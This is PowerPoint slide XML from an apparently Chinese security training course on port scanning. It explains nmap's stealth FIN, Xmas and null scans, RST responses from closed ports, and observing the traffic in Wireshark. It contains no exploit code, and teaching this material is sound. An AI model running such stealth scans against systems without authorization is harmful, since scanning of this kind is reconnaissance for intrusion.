          <p:cNvPr id="3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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5" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 端口扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="文本框 103"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5521325" y="1172527"/>
            <a:ext cx="5080000" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2.查看Wireshark中返回的响应数据包，全部都返回了RST响应包，使用nmap判断1000个端口全部都是关闭的，如图2-2-47所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5521325" y="2094548"/>
            <a:ext cx="5276850" cy="3552825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="文本框 104"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5521325" y="5647373"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-47 目标主机返回数据包</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行隐蔽的主机端口扫描并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤七</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>07</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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6" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 端口扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="文本框 104"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4268470" y="515620"/>
            <a:ext cx="7658100" cy="1753235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>nmap隐蔽扫描有三个选项，-sF(秘密FIN数据包扫描)，-sX(Xmas圣诞树扫描)，-sN （TCP空扫描)。TCP FIN的扫描方式是目标端口发送FIN数据包，这种扫描的穿透性非常好，因为它发送的FIN数据包并不需要进行TCP三次握手。根据 RFC793规定，对于所有关闭的端口，目标服务器都会返回一个有RST标志的数据包。1.打开终端的Wireshark工具对本地网卡进行监听，如图2-2-48所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11"/>
          <p:cNvPicPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4853305" y="2268538"/>
            <a:ext cx="5267325" cy="3590925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106" name="文本框 105"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4853305" y="5859463"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-48 打开Wireshark工具</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行隐蔽的主机端口扫描并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
